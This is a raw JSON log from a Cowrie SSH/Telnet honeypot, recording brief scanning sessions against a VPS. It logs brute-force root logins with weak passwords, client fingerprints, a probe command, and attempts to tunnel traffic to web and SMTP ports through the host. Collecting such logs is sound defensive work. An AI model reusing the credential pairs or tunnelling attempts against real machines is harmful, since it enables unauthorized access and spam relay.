{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:44:16.418267Z","src_ip":"212.227.235.229","session":"270b0b4c2d76"}
{"eventid":"cowrie.command.input","input":"","message":"CMD: ","sensor":"my-vps","timestamp":"2025-08-31T07:44:16.536395Z","src_ip":"212.227.235.229","session":"270b0b4c2d76"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51790,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea4c79d03186","protocol":"ssh","message":"New connection: 217.72.205.35:51790 (1.2.3.4:22) [session: ea4c79d03186]","sensor":"my-vps","timestamp":"2025-08-31T07:44:17.220555Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:44:17.221660Z","src_ip":"217.72.205.35","session":"ea4c79d03186"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","size":454,"shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","duplicate":true,"duration":"4.2","message":"Closing TTY Log: var/lib/cowrie/tty/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:44:20.587645Z","src_ip":"212.227.235.229","session":"270b0b4c2d76"}
{"eventid":"cowrie.session.closed","duration":5.122807502746582,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:44:20.591205Z","src_ip":"212.227.235.229","session":"270b0b4c2d76"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54690,"dst_ip":"1.2.3.4","dst_port":23,"session":"53279e32d7c1","protocol":"telnet","message":"New connection: 212.227.235.229:54690 (1.2.3.4:23) [session: 53279e32d7c1]","sensor":"my-vps","timestamp":"2025-08-31T07:44:22.426420Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:44:22.613189Z","src_ip":"212.227.235.229","session":"53279e32d7c1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:44:22.637611Z","src_ip":"212.227.235.229","session":"53279e32d7c1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":1384,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9499c179f5e","protocol":"ssh","message":"New connection: 212.227.235.229:1384 (1.2.3.4:22) [session: e9499c179f5e]","sensor":"my-vps","timestamp":"2025-08-31T07:44:23.761251Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:44:23.762473Z","src_ip":"212.227.235.229","session":"e9499c179f5e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":1781,"dst_ip":"1.2.3.4","dst_port":22,"session":"55af2928d4ca","protocol":"ssh","message":"New connection: 212.227.235.229:1781 (1.2.3.4:22) [session: 55af2928d4ca]","sensor":"my-vps","timestamp":"2025-08-31T07:44:23.917082Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:44:23.917968Z","src_ip":"212.227.235.229","session":"55af2928d4ca"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-31T07:44:24.082181Z","src_ip":"212.227.235.229","session":"55af2928d4ca"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:44:24.560881Z","src_ip":"212.227.235.229","session":"55af2928d4ca"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-31T07:44:24.720726Z","session":"55af2928d4ca"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:45:33.919588Z","src_ip":"212.227.235.229","session":"55af2928d4ca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53120,"dst_ip":"1.2.3.4","dst_port":22,"session":"98e4856dd943","protocol":"ssh","message":"New connection: 212.227.125.160:53120 (1.2.3.4:22) [session: 98e4856dd943]","sensor":"my-vps","timestamp":"2025-08-31T07:45:53.112839Z"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:45:54.898820Z","src_ip":"212.227.125.160","session":"98e4856dd943"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39845,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2b4c5df65f0","protocol":"ssh","message":"New connection: 212.227.235.229:39845 (1.2.3.4:22) [session: e2b4c5df65f0]","sensor":"my-vps","timestamp":"2025-08-31T07:46:03.093096Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:46:03.577524Z","src_ip":"212.227.235.229","session":"e2b4c5df65f0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:46:03.741666Z","src_ip":"212.227.235.229","session":"e2b4c5df65f0"}
{"eventid":"cowrie.login.failed","username":"repository","password":"repository","message":"login attempt [repository/repository] failed","sensor":"my-vps","timestamp":"2025-08-31T07:46:12.530132Z","src_ip":"212.227.235.229","session":"e2b4c5df65f0"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":33388,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad9863a3498d","protocol":"ssh","message":"New connection: 201.148.180.50:33388 (1.2.3.4:22) [session: ad9863a3498d]","sensor":"my-vps","timestamp":"2025-08-31T07:46:12.851622Z"}
{"eventid":"cowrie.session.closed","duration":"10.6","message":"Connection lost after 10.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:46:13.714279Z","src_ip":"212.227.235.229","session":"e2b4c5df65f0"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:46:14.809730Z","src_ip":"201.148.180.50","session":"ad9863a3498d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48046,"dst_ip":"1.2.3.4","dst_port":23,"session":"c320ad1d574c","protocol":"telnet","message":"New connection: 212.227.235.229:48046 (1.2.3.4:23) [session: c320ad1d574c]","sensor":"my-vps","timestamp":"2025-08-31T07:46:34.797848Z"}
{"eventid":"cowrie.session.closed","duration":31.245683193206787,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:47:06.043462Z","src_ip":"212.227.235.229","session":"c320ad1d574c"}
{"eventid":"cowrie.session.connect","src_ip":"59.24.108.225","src_port":37745,"dst_ip":"1.2.3.4","dst_port":23,"session":"96ac5f6272ad","protocol":"telnet","message":"New connection: 59.24.108.225:37745 (1.2.3.4:23) [session: 96ac5f6272ad]","sensor":"my-vps","timestamp":"2025-08-31T07:47:10.884044Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:47:22.643093Z","src_ip":"212.227.235.229","session":"53279e32d7c1"}
{"eventid":"cowrie.session.closed","duration":180.22182536125183,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:47:22.648164Z","src_ip":"212.227.235.229","session":"53279e32d7c1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58270,"dst_ip":"1.2.3.4","dst_port":23,"session":"43e804eafdc3","protocol":"telnet","message":"New connection: 212.227.235.229:58270 (1.2.3.4:23) [session: 43e804eafdc3]","sensor":"my-vps","timestamp":"2025-08-31T07:47:23.677703Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:47:24.189329Z","src_ip":"212.227.235.229","session":"43e804eafdc3"}
{"eventid":"cowrie.session.closed","duration":2.5738158226013184,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:47:26.251445Z","src_ip":"212.227.235.229","session":"43e804eafdc3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38818,"dst_ip":"1.2.3.4","dst_port":23,"session":"54d538411b65","protocol":"telnet","message":"New connection: 212.227.235.229:38818 (1.2.3.4:23) [session: 54d538411b65]","sensor":"my-vps","timestamp":"2025-08-31T07:47:26.507832Z"}
{"eventid":"cowrie.session.closed","duration":4.178887128829956,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:47:30.686654Z","src_ip":"212.227.235.229","session":"54d538411b65"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38828,"dst_ip":"1.2.3.4","dst_port":23,"session":"f9880f0e6c20","protocol":"telnet","message":"New connection: 212.227.235.229:38828 (1.2.3.4:23) [session: f9880f0e6c20]","sensor":"my-vps","timestamp":"2025-08-31T07:47:30.899782Z"}
{"eventid":"cowrie.login.success","username":"root","password":"icatch99","message":"login attempt [root/icatch99] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:47:31.397143Z","src_ip":"212.227.235.229","session":"f9880f0e6c20"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:47:31.421794Z","src_ip":"212.227.235.229","session":"f9880f0e6c20"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-31T07:47:31.657161Z","src_ip":"212.227.235.229","session":"f9880f0e6c20"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"3.0","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:47:34.402239Z","src_ip":"212.227.235.229","session":"f9880f0e6c20"}
{"eventid":"cowrie.session.closed","duration":3.507932186126709,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:47:34.407612Z","src_ip":"212.227.235.229","session":"f9880f0e6c20"}
{"eventid":"cowrie.session.closed","duration":31.39609384536743,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:47:42.280071Z","src_ip":"59.24.108.225","session":"96ac5f6272ad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54909,"dst_ip":"1.2.3.4","dst_port":22,"session":"33e32921e7e7","protocol":"ssh","message":"New connection: 212.227.125.160:54909 (1.2.3.4:22) [session: 33e32921e7e7]","sensor":"my-vps","timestamp":"2025-08-31T07:48:17.833760Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:48:17.834923Z","src_ip":"212.227.125.160","session":"33e32921e7e7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T07:48:18.027220Z","src_ip":"212.227.125.160","session":"33e32921e7e7"}
{"eventid":"cowrie.login.success","username":"root","password":"qwer","message":"login attempt [root/qwer] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:48:18.596253Z","src_ip":"212.227.125.160","session":"33e32921e7e7"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:48:18.787376Z","src_ip":"212.227.125.160","session":"33e32921e7e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37048,"dst_ip":"1.2.3.4","dst_port":23,"session":"977c7289a9f5","protocol":"telnet","message":"New connection: 212.227.235.229:37048 (1.2.3.4:23) [session: 977c7289a9f5]","sensor":"my-vps","timestamp":"2025-08-31T07:49:15.534199Z"}
{"eventid":"cowrie.session.closed","duration":30.581785440444946,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:49:46.115914Z","src_ip":"212.227.235.229","session":"977c7289a9f5"}
{"eventid":"cowrie.session.connect","src_ip":"61.52.51.65","src_port":50133,"dst_ip":"1.2.3.4","dst_port":23,"session":"77e9eb5fb7d6","protocol":"telnet","message":"New connection: 61.52.51.65:50133 (1.2.3.4:23) [session: 77e9eb5fb7d6]","sensor":"my-vps","timestamp":"2025-08-31T07:50:34.398347Z"}
{"eventid":"cowrie.session.closed","duration":12.658252954483032,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:50:47.056530Z","src_ip":"61.52.51.65","session":"77e9eb5fb7d6"}
{"eventid":"cowrie.session.connect","src_ip":"61.52.51.65","src_port":50438,"dst_ip":"1.2.3.4","dst_port":23,"session":"94805de3bfa8","protocol":"telnet","message":"New connection: 61.52.51.65:50438 (1.2.3.4:23) [session: 94805de3bfa8]","sensor":"my-vps","timestamp":"2025-08-31T07:50:47.236580Z"}
{"eventid":"cowrie.session.closed","duration":12.819642066955566,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:51:00.056149Z","src_ip":"61.52.51.65","session":"94805de3bfa8"}
{"eventid":"cowrie.session.connect","src_ip":"61.52.51.65","src_port":50753,"dst_ip":"1.2.3.4","dst_port":23,"session":"2cb8d09461ac","protocol":"telnet","message":"New connection: 61.52.51.65:50753 (1.2.3.4:23) [session: 2cb8d09461ac]","sensor":"my-vps","timestamp":"2025-08-31T07:51:00.231341Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51410,"dst_ip":"1.2.3.4","dst_port":22,"session":"b15dbb367e33","protocol":"ssh","message":"New connection: 217.72.205.35:51410 (1.2.3.4:22) [session: b15dbb367e33]","sensor":"my-vps","timestamp":"2025-08-31T07:51:05.866785Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:51:05.867853Z","src_ip":"217.72.205.35","session":"b15dbb367e33"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":35943,"dst_ip":"1.2.3.4","dst_port":22,"session":"88c6885df5fa","protocol":"ssh","message":"New connection: 80.94.95.15:35943 (1.2.3.4:22) [session: 88c6885df5fa]","sensor":"my-vps","timestamp":"2025-08-31T07:51:07.793257Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T07:51:07.794167Z","src_ip":"80.94.95.15","session":"88c6885df5fa"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T07:51:07.845004Z","src_ip":"80.94.95.15","session":"88c6885df5fa"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa11223344","message":"login attempt [root/Aa11223344] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:51:08.132313Z","src_ip":"80.94.95.15","session":"88c6885df5fa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"80.94.95.15","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-31T07:51:08.186087Z","session":"88c6885df5fa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-31T07:51:08.237028Z","src_ip":"80.94.95.15","session":"88c6885df5fa"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:51:08.289130Z","src_ip":"80.94.95.15","session":"88c6885df5fa"}
{"eventid":"cowrie.session.closed","duration":12.810622692108154,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:51:13.041899Z","src_ip":"61.52.51.65","session":"2cb8d09461ac"}
{"eventid":"cowrie.session.connect","src_ip":"61.52.51.65","src_port":51067,"dst_ip":"1.2.3.4","dst_port":23,"session":"c6a5bd462fe1","protocol":"telnet","message":"New connection: 61.52.51.65:51067 (1.2.3.4:23) [session: c6a5bd462fe1]","sensor":"my-vps","timestamp":"2025-08-31T07:51:13.199842Z"}
{"eventid":"cowrie.session.closed","duration":12.837134599685669,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:51:26.036915Z","src_ip":"61.52.51.65","session":"c6a5bd462fe1"}
{"eventid":"cowrie.session.connect","src_ip":"61.52.51.65","src_port":51380,"dst_ip":"1.2.3.4","dst_port":23,"session":"ad3abae6248a","protocol":"telnet","message":"New connection: 61.52.51.65:51380 (1.2.3.4:23) [session: ad3abae6248a]","sensor":"my-vps","timestamp":"2025-08-31T07:51:26.237972Z"}
{"eventid":"cowrie.session.closed","duration":12.835931539535522,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:51:39.073745Z","src_ip":"61.52.51.65","session":"ad3abae6248a"}
{"eventid":"cowrie.session.connect","src_ip":"61.52.51.65","src_port":51711,"dst_ip":"1.2.3.4","dst_port":23,"session":"30e7e0cecf2d","protocol":"telnet","message":"New connection: 61.52.51.65:51711 (1.2.3.4:23) [session: 30e7e0cecf2d]","sensor":"my-vps","timestamp":"2025-08-31T07:51:39.252096Z"}
{"eventid":"cowrie.session.closed","duration":12.816323280334473,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:51:52.068355Z","src_ip":"61.52.51.65","session":"30e7e0cecf2d"}
{"eventid":"cowrie.session.connect","src_ip":"61.52.51.65","src_port":52046,"dst_ip":"1.2.3.4","dst_port":23,"session":"3675e626a090","protocol":"telnet","message":"New connection: 61.52.51.65:52046 (1.2.3.4:23) [session: 3675e626a090]","sensor":"my-vps","timestamp":"2025-08-31T07:51:52.227645Z"}
{"eventid":"cowrie.session.closed","duration":12.84623408317566,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:52:05.073811Z","src_ip":"61.52.51.65","session":"3675e626a090"}
{"eventid":"cowrie.session.connect","src_ip":"61.52.51.65","src_port":52373,"dst_ip":"1.2.3.4","dst_port":23,"session":"5e03098635d2","protocol":"telnet","message":"New connection: 61.52.51.65:52373 (1.2.3.4:23) [session: 5e03098635d2]","sensor":"my-vps","timestamp":"2025-08-31T07:52:05.285734Z"}
{"eventid":"cowrie.session.closed","duration":12.7678542137146,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:52:18.053492Z","src_ip":"61.52.51.65","session":"5e03098635d2"}
{"eventid":"cowrie.session.connect","src_ip":"61.52.51.65","src_port":52694,"dst_ip":"1.2.3.4","dst_port":23,"session":"d7234505731b","protocol":"telnet","message":"New connection: 61.52.51.65:52694 (1.2.3.4:23) [session: d7234505731b]","sensor":"my-vps","timestamp":"2025-08-31T07:52:18.232127Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52800,"dst_ip":"1.2.3.4","dst_port":22,"session":"2bd41230cdf8","protocol":"ssh","message":"New connection: 212.227.125.160:52800 (1.2.3.4:22) [session: 2bd41230cdf8]","sensor":"my-vps","timestamp":"2025-08-31T07:52:28.722347Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:52:29.361684Z","src_ip":"212.227.125.160","session":"2bd41230cdf8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T07:52:29.362416Z","src_ip":"212.227.125.160","session":"2bd41230cdf8"}
